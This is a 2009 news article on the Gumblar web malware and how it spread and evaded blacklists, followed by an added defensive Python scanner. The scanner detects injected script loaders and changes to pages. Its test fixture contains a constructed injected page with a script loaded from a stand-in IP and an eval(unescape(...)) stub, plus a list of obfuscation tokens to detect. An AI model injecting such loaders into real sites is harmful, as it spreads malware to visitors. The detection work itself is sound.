‘Gumblar’ virus could be bigger than Conficker worm

25 May 2009

A new piece of malware is on the loose and within days has become responsible for half of the malware found on the web. It is particularly vicious because it targets Google search users.

The malware, also known as JSRedir-R, infects computers by exploiting vulnerabilities in Adobe Reader and Flash Player.

By last week, more than half of all malware found on websites was identified as Gumblar, with a new webpage infected every 4.5 seconds.

On an infected machine, the malware redirects the user’s Google search results to sites that download further malware onto the computer or allow criminals to conduct phishing attacks to steal login details.

It spreads through legitimate websites whose passwords or server software have already been compromised; visitors to those sites are infected without realising it.

The code injected into compromised sites is believed to load its payload from a website hosted in China.

Once cybercriminals are in possession of a victim’s FTP credentials, any sites that the victim manages can also be targeted for compromise – a common malware propagation tactic, said IT security firm ScanSafe.

“Because of the complexity of the Gumblar compromises, detection via traditional methods, such as signature detection and blacklisting, is ineffective,” said Mary Landesman, senior security researcher at ScanSafe.

“Gumblar’s sophistication and incredible growth rate should serve as a wake-up call to the IT community. As cybercrime evolves in sophistication, so must our protection against it.”

Google delisted the compromised websites as soon as the breach was discovered. In early May, however, the attackers noticed this and began swapping the IP address of the server hosting the malicious code for a new one, so that the compromised sites escaped the blacklist and were once again listed by search engines. The tampering with search results and the redirection both happen locally, on the infected user’s computer, and not on the search engine itself, so Google’s own results are untouched.
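Because the attackers could defeat a blacklist simply by changing the IP address the injected loader points at, a webmaster checking their own pages is better served by a check that does not depend on any particular address. The following script is an added example, not code from the article or from ScanSafe: it parses a page's own HTML, flags any script loaded from a host outside a hypothetical allow-list or from a bare IP literal, flags inline scripts that use common obfuscation primitives, and keeps a SHA-256 baseline so that any change to a deployed page is noticed regardless of what the new loader looks like. The allow-list, the sample pages and the 198.51.100.23 loader address are all constructed for the example.

```python
"""Heuristic scan of a site's own HTML for injected script loaders.

Added example (not part of the original article or any vendor tooling).
Assumptions: the webmaster knows which hosts legitimately serve script to
the site (ALLOWED_HOSTS) and has recorded a SHA-256 baseline of each page
at deployment time.
"""
import hashlib
import re
from html.parser import HTMLParser
from urllib.parse import urlparse

# Hypothetical allow-list of hosts this site expects to load script from.
ALLOWED_HOSTS = {"www.example.com", "cdn.example.com"}

# Obfuscation primitives that hand-written page scripts rarely need.
SUSPICIOUS_TOKENS = ("eval(", "unescape(", "fromCharCode", "document.write(")


class _ScriptCollector(HTMLParser):
    """Collect external script sources and inline script bodies from a page."""

    def __init__(self):
        super().__init__()
        self.external = []   # values of <script src="...">
        self.inline = []     # bodies of <script>...</script>
        self._in_script = False

    def handle_starttag(self, tag, attrs):
        if tag.lower() != "script":
            return
        src = dict(attrs).get("src")
        if src:
            self.external.append(src)
        else:
            self._in_script = True
            self.inline.append("")

    def handle_endtag(self, tag):
        if tag.lower() == "script":
            self._in_script = False

    def handle_data(self, data):
        # The parser may deliver a script body in several chunks.
        if self._in_script:
            self.inline[-1] += data


def scan_html(html, allowed_hosts=ALLOWED_HOSTS):
    """Return a list of (kind, detail) findings for one HTML document."""
    parser = _ScriptCollector()
    parser.feed(html)
    parser.close()
    findings = []
    for src in parser.external:
        host = urlparse(src).hostname
        if host is None:
            continue  # relative URL: served by the site itself
        if re.fullmatch(r"\d{1,3}(\.\d{1,3}){3}", host):
            # A script pulled straight from an IP literal is a strong signal;
            # it is also exactly what changes when the attacker rotates servers.
            findings.append(("ip-literal-script", src))
        elif host not in allowed_hosts:
            findings.append(("unlisted-script-host", src))
    for body in parser.inline:
        hits = [t for t in SUSPICIOUS_TOKENS if t in body]
        if hits:
            findings.append(("obfuscated-inline-script", ",".join(hits)))
    return findings


def digest(html):
    """SHA-256 of the page as deployed; record this as the known-good baseline."""
    return hashlib.sha256(html.encode("utf-8")).hexdigest()


def changed_since_baseline(html, baseline_hex):
    """True if the page differs at all from its recorded baseline."""
    return digest(html) != baseline_hex


# Constructed sample pages (not captured from any real compromise).
CLEAN_PAGE = """<html><head>
<script src="https://cdn.example.com/site.js"></script>
</head><body><p>Hello</p></body></html>"""

# Same page with an injected loader from a bare IP (documentation range
# 198.51.100.0/24) and an obfuscated inline stub appended before </body>.
INJECTED_PAGE = CLEAN_PAGE.replace(
    "</body>",
    '<script src="http://198.51.100.23/x.php"></script>'
    '<script>eval(unescape("%64%6f%63"))</script></body>',
)

if __name__ == "__main__":
    baseline = digest(CLEAN_PAGE)
    for name, page in (("clean", CLEAN_PAGE), ("injected", INJECTED_PAGE)):
        print(name, "changed:", changed_since_baseline(page, baseline),
              "findings:", scan_html(page))
```

The baseline comparison is the part that survives the attackers' IP rotation: the heuristics will miss a loader hosted on a plausible-looking domain, but a page that has changed since deployment without the webmaster having changed it is suspicious whatever the new content looks like.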

“The cybercriminals responsible for Gumblar have learned to morph its features quickly,” said Landesman. “This, coupled with Gumblar’s other dynamic characteristics, is allowing the compromise to disseminate more rapidly than others we’ve seen.”

Gumblar is the latest wave of serious website compromises that have plagued web surfers for the past two years. Overall, web malware increased 300pc throughout 2008, with another 19pc increase in the first quarter of 2009.

By John Kennedy